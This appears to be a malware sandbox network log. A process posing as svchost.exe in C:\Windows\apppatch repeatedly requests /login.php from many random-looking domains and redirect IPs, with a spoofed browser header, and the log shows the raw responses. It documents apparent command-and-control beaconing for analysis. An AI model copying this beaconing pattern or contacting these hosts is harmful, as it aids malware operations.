                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.863095045 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.237633944 CET979INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:55 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://lysyvan.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WDJMvl0svDdqsOf3nEPDc0w9VwTu88NCydkrxGhAhNWyLiSxf%2BONBazXFB26Nm0B8bcG783cw6GmNWB3G8JyvZ4%2FfU3bl7K%2B%2FluiW5ZURwAhEG699PD1THhmejhJXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020992f377cac-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1605&sent=13&recv=15&lost=0&retrans=0&sent_bytes=2928&recv_bytes=972&delivery_rate=2509532&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  19192.168.2.64974518.208.156.248801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.853898048 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: pupycag.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.292576075 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=8d293bb926a50208151153d535bf67ed|66.23.206.109|1731347434|1731347434|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  20192.168.2.6497463.94.10.34801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.890563011 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lygynud.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.316792965 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=28f9d138874c3d54e926818f975a604a|66.23.206.109|1731347434|1731347434|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  21192.168.2.649753103.150.10.48801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.553677082 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyrysor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.422513008 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                  Server: openresty/1.15.8.1
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:35 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 151
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://106.15.232.163:8000/dh/147287063_377283.html#index8?d=lyrysor.com
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.205785036 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyrysor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.525111914 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                  Server: openresty/1.15.8.1
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 151
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://106.15.232.163:8000/dh/147287063_377283.html#index8?d=lyrysor.com
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262926102 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyrysor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.549405098 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                  Server: openresty/1.15.8.1
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:52 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 151
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://106.15.232.163:8000/dh/147287063_377283.html#index8?d=lyrysor.com
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.898982048 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyrysor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.193872929 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                  Server: openresty/1.15.8.1
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:53 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 151
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://106.15.232.163:8000/dh/147287063_377283.html#index8?d=lyrysor.com
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  22192.168.2.649759106.15.232.16380001112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.432241917 CET290OUTGET /dh/147287063_377283.html HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: 106.15.232.163:8000
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.204205990 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: openresty/1.21.4.3
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 561
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.545608044 CET290OUTGET /dh/147287063_377283.html HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: 106.15.232.163:8000
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.811590910 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: openresty/1.21.4.3
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 561
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.630358934 CET290OUTGET /dh/147287063_377283.html HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: 106.15.232.163:8000
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.897447109 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: openresty/1.21.4.3
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:52 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 561
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.195024967 CET290OUTGET /dh/147287063_377283.html HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: 106.15.232.163:8000
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.461175919 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: openresty/1.21.4.3
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:53 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 561
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  23192.168.2.64978664.225.91.73801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.782397985 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galynuh.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.332880020 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                                  server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  content-type: text/html
                                                                                                                                                                                                                  content-length: 593
                                                                                                                                                                                                                  last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                                  etag: "63f68860-251"
                                                                                                                                                                                                                  accept-ranges: bytes
